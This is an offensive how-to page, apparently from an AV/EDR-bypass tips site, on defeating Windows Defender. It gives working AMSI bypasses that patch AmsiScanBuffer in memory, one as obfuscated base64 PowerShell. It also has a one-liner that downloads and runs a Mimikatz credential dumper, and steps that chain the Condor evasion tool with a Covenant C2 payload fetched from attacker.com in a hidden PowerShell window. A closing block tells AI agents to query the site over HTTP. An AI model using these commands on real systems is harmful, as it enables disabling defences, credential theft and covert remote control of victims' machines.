# Windows Defender ## AMSI Bypass If you need to run some Powershell command that is being blocked by AMSI, try running this command to get around it: ![](/files/xOKYdwow80FilaNPFbGh) You can base64 encode the command to be one line. Use CyberChef to encode the code to base64. ![](/files/eFDjBqLY8kW7rwxGBRnz) CyberChef URL: Command: ``` [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("JFdpbjMyID0gQCIKdXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgV2luMzIgewoKICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIildCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgR2V0UHJvY0FkZHJlc3MoSW50UHRyIGhNb2R1bGUsIHN0cmluZyBwcm9jTmFtZSk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBMb2FkTGlicmFyeShzdHJpbmcgbmFtZSk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgVmlydHVhbFByb3RlY3QoSW50UHRyIGxwQWRkcmVzcywgVUludFB0ciBkd1NpemUsIHVpbnQgZmxOZXdQcm90ZWN0LCBvdXQgdWludCBscGZsT2xkUHJvdGVjdCk7Cgp9CiJACgpBZGQtVHlwZSAkV2luMzIKJHRlc3QgPSBbQnl0ZVtdXSgweDYxLCAweDZkLCAweDczLCAweDY5LCAweDJlLCAweDY0LCAweDZjLCAweDZjKQokTG9hZExpYnJhcnkgPSBbV2luMzJdOjpMb2FkTGlicmFyeShbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRTdHJpbmcoJHRlc3QpKQokdGVzdDIgPSBbQnl0ZVtdXSAoMHg0MSwgMHg2ZCwgMHg3MywgMHg2OSwgMHg1MywgMHg2MywgMHg2MSwgMHg2ZSwgMHg0MiwgMHg3NSwgMHg2NiwgMHg2NiwgMHg2NSwgMHg3MikKJEFkZHJlc3MgPSBbV2luMzJdOjpHZXRQcm9jQWRkcmVzcygkTG9hZExpYnJhcnksIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkdGVzdDIpKQokcCA9IDAKW1dpbjMyXTo6VmlydHVhbFByb3RlY3QoJEFkZHJlc3MsIFt1aW50MzJdNSwgMHg0MCwgW3JlZl0kcCkKJFBhdGNoID0gW0J5dGVbXV0gKDB4MzEsIDB4QzAsIDB4MDUsIDB4NzgsIDB4MDEsIDB4MTksIDB4N0YsIDB4MDUsIDB4REYsIDB4RkUsIDB4RUQsIDB4MDAsIDB4QzMpCiMwOiAgMzEgYzAgICAgICAgICAgICAgICAgICAgeG9yICAgIGVheCxlYXgKIzI6ICAwNSA3OCAwMSAxOSA3ZiAgICAgICAgICBhZGQgICAgZWF4LDB4N2YxOTAxNzgKIzc6ICAwNSBkZiBmZSBlZCAwMCAgICAgICAgICBhZGQgICAgZWF4LDB4ZWRmZWRmCiNjOiAgYzMgICAgICAgICAgICAgICAgICAgICAgcmV0IApbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCRQYXRjaCwgMCwgJEFkZHJlc3MsICRQYXRjaC5MZW5ndGgp")) | IEX ``` ### Execution ![](/files/mIC7FVWCv6fN0x0uxldD) ## Defeating Windows Defender & Bypassing Amsi And Running Mimikatz ### Execution ![](/files/kvZiPoEGo4jks2CRZeRn) Command: ``` iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing) ``` ## Using condor tool + AMSI bypass + Covenant C2 The [condor](https://github.com/MrEmpy/Condor) tool is used for evasion of protection like AVs/EDRs/XDRs. You can use it to combo an AMSI bypass and a C2 like Covenant. 1. On the attacker's machine, create a folder where there will be two powershell scripts, one to bypass AMSI and another for the target to connect with C2. bypass.ps1 ``` # TLDR: # iex(wget https://gist.githubusercontent.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/4cee3d04127ca304bb04c9d95f3146eb7e9985a8/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing) # # @author Pichaya Morimoto (p.morimoto@sth.sh) # One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition # (Tested and worked on Windows 10 x64 patched 2022-03-26) # # Usage: # 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all) # 2. iex(wget https://gist.githubusercontent.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/4cee3d04127ca304bb04c9d95f3146eb7e9985a8/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing) # or # iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing) # # AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021) # https://payatu.com/blog/arun.nair/amsi-bypass $code = @" using System; using System.Runtime.InteropServices; public class WinApi { [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name); [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out int lpflOldProtect); } "@ Add-Type $code $amsiDll = [WinApi]::LoadLibrary("amsi.dll") $asbAddr = [WinApi]::GetProcAddress($amsiDll, "Ams"+"iScan"+"Buf"+"fer") $ret = [Byte[]] ( 0xc3, 0x80, 0x07, 0x00,0x57, 0xb8 ) $out = 0 [WinApi]::VirtualProtect($asbAddr, [uint32]$ret.Length, 0x40, [ref] $out) [System.Runtime.InteropServices.Marshal]::Copy($ret, 0, $asbAddr, $ret.Length) [WinApi]::VirtualProtect($asbAddr, [uint32]$ret.Length, $out, [ref] $null) # nishang - 2.2.0 (Jul 24, 2021) # Change this to "attacker-local-ip" for internal sources iex(wget http://attacker.com/exec.ps1 -UseBasicParsing) ``` [Reference](https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093) On the last line where there is the `wget` command, put the IP of the attacker's machine where it will contain the two files (bypass.ps1 and exec.ps1) 1. Go to Covenant and generate a powershell payload ![](/files/EoUtMhBKW8xnKulsX3QJ) ![](/files/QaqOIfwfoPYPdVcTPt9i) The payload will look like this: exec.ps1 ``` sv o (New-Object IO.MemoryStream);sv d (New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('7Vp7cFzle... ``` 1. Now create a file called exec.ps1 and paste the modified payload 2. Open an HTTP port so the target can connect to it and run bypass.ps1 ![](/files/UQ3kWDLJJXWXrfrUhMU9) 1. Run the following command using the condor tool: ``` python3 condor.py -p windows/x64/exec ``` 1. Paste the following command: ``` powershell -Sta -Nop -Window Hidden -Command "iex(wget http://attacker.com/bypass.ps1 -UseBasicParsing)" ``` Substitute "attacker.com" for the ip of the attacker's machine. 1. After generating the EXE, run it on the target machine. ![](/files/tkMKao2OLvjomWeqyMCV) ![](/files/lsq77w6yyDeZXGEmwtYy) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mrempy.gitbook.io/awesome-av-edr-xdr-bypass-tips/readme/windows-defender.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.